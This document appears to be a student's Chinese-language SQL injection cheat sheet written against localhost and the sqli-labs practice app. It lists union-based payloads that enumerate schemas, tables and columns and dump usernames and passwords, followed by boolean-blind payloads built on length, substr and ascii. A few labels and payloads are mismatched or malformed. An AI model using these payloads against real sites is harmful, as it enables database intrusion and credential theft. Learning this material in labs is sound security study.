http://localhost/index.php?uid=88’ union select 1,schema_name,3 from information_schema.schemata–+
-----查询所有数据库名
http://localhost/index.php?uid=88 union select 1,table_name,3 from information_schema.tables where table_schema=“zrb”–+
-----查询zrb数据库里的表明
http://localhost/index.php?uid=88 union select 1,column_name,3 from information_schema.columns where table_schema=“zrb” and table_name=“dt_users”–
-----查询zrb数据库里的dt_users表内的列名
http://localhost/index.php?uid=88 union select last_login_ip,username,password from dt_users–+
-----已知库名 表名 列名 直接查询具体数据
http://localhost/sqli/Less-1/?id=pijkk’ union select 1,schema_name,3 from information_schema.schemata limit 3,1–
—获取数据库名长度
and length(database())>10–+
database() 当前数据库名 length()字符串长度
security – 数据库名
—ascii码匹配数据库名字符串
ascii(substr(database(),1,1))=87
—匹配数据库名字符串
’ and substr(database(),1,1)=‘s’–+
ascii将字符转换成ascii码 substr()截断字符串 接受两个参数 第一个参数是从那个位置开始 第二个参数是截取字符
----表名长度
’ and length((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1))=6–+
----表名的ascii码遍历 --email
’ and ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),4,1))=105–+
----列名的长度
’ and substr((select column_name from information_schema.columns where table_schema=database() and table_name=‘emails’ limit 0,1),1,1)>100
----列名的ascii码遍历 – id
’ and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=‘emails’ limit 0,1),4,1))=105–+
假设有 username password 两个列名 我们想获取其中的数据
’ and substr((select username,password from emails limit 0,1),1,1)>100
’ and ascii(substr((select username,password from emails limit 0,1),1,1))=105–++